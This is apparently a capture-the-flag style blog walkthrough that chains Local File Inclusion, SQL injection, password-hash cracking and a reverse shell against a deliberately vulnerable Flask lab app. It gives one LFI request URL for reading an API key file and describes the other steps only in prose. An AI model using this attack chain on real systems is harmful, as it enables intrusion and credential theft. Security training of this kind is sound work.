In this blog, we will walk through a sequence of attacks on a vulnerable Flask application, leveraging Local File Inclusion (LFI), SQL Injection (SQLi), and a Reverse Shell to gain control. Below is the Python script that automates the process.
Challenge Overview
Link to the challenge: Whitebox Web Application Pentest
PoC Code: Whitebox Web Application Pentest Exploit
📁 Note: The full source code is located in the Source-Code-Lab directory.
Step 1: Extract API Key Using LFI
First, we’ll perform a Local File Inclusion (LFI) to retrieve the API key from the server’s file system.
Use the following request to trigger the LFI vulnerability:
http://10.0.1.4:5000/download_file?file=conf/apikey.txt
Step 2: SQL Injection to Extract Username
Next, we use SQL Injection to extract the username by querying the profile endpoint.
Step 3: SQL Injection to Retrieve Password Hash
We continue with SQL Injection to extract the password hash of the found username.
Step 4: Crack the Password Hash
Once we have the password hash, we will attempt to crack it using a wordlist (e.g., Rockyou).
Step 5: Login to the Application
Using the cracked password, we login to the application.
Step 6: Trigger Reverse Shell (RCE)
Finally, we trigger a reverse shell by exploiting a DNS parameter. This sends a reverse shell command to our attacker's server.
Execution
Run the exploit with the following command:
This will extract the API key, perform SQL Injection to retrieve the username and hash, crack the password, log in, and finally trigger a reverse shell.
Conclusion
In this post, we demonstrated how to exploit vulnerabilities in a Flask application using LFI, SQL Injection, and Reverse Shell. Remember, this is for educational purposes only, and such activities should only be performed on systems you have explicit permission to test.
Great practice for OSWE and eWPTX prep — covers LFI, SQLi, auth bypass, and RCE chaining.
